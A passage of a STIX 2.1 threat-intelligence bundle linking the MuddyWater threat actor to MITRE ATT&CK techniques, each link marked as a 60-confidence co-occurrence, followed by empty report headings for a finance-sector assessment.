"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--e5974f70-5745-450a-908a-6483ad9c4678",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Exploitation for Client Execution (T1203) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--655b3935-b3e7-47bd-bcf0-b2e168687c59",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--771ed4e5-6dde-43a8-9c72-d006b0c83e3d",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Command and Scripting Interpreter (T1059) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--f7a31206-4513-420a-ad4c-686d6045b5ad",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--13fc9cbe-9444-4eba-872b-a44565ae3ab7",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Supply Chain Compromise (T1195) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--ea4f3740-3edf-4a49-b4ff-cec4313ccc87",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--ce39e6f2-b20f-421e-83e1-242a773e1927",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Create or Modify System Process (T1543) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--45fe84ee-efbe-4421-bb01-e6d6641f64f8",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--d5229cf6-f11b-41bc-8aca-0df713047400",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Boot or Logon Autostart Execution (T1547) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--d5e1003d-1187-486a-9a30-ab8e28d6248a",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--4a2578d4-fdf6-48d3-b66a-93c681e1e21e",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Application Layer Protocol (T1071) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--334da1c4-6e96-4dfb-a37f-984be7b542d9",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--68a5c7b8-09b4-49b1-8149-bc23ed0260c9",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Non-Application Layer Protocol (T1095) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--33c60d98-4dad-4c7a-8872-61ab39baa8f3",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--06cf8802-38e4-4421-a699-33a0bae74d96",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and System Information Discovery (T1082) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--eb4226af-9bb3-4855-931d-5d44d13c87bb",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--2e52cc86-c2ef-43d7-9f1e-2fc59c4845ee",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and File and Directory Discovery (T1083) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--07b73f78-11ff-4e5e-8f6f-f1dec9870e28",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--943edc6f-c0f9-48f1-b8d4-4666aa0abae1",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Process Discovery (T1057) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--8d8423e2-43b6-42fa-ac15-447aa227ccae",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--12a5aa0e-cd1f-4614-97d0-872085aa494b",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Exploitation of Remote Services (T1210) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--1e041532-9123-49fd-8932-0d4ac5538268",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--d2a77ce3-d278-4f77-97f0-227b744a33d3",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Archive via Utility (T1560.001) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
},
{
"type": "relationship",
"spec_version": "2.1",
"id": "relationship--f41170b8-68af-413c-99d6-303751d2d9b1",
"created": "2025-12-08T13:54:59.238Z",
"modified": "2025-12-08T13:54:59.238Z",
"relationship_type": "uses",
"source_ref": "threat-actor--edfc3090-ec61-44a7-8e38-e5c05bfd4909",
"target_ref": "attack-pattern--27b36b6d-ae90-4767-b07a-563ecef589ea",
"confidence": 60,
"description": "Co-occurrence: MuddyWater and Scheduled Task (T1053.005) in same intelligence",
"x_validation_method": "mitre-cooccurrence"
}
]
}
Finance (PCI-DSS)
ELEVATED
CRITICAL ITEMS
HIGH SEVERITY ITEMS
MEDIUM SEVERITY ITEMS
DETECTION & RESPONSE KIT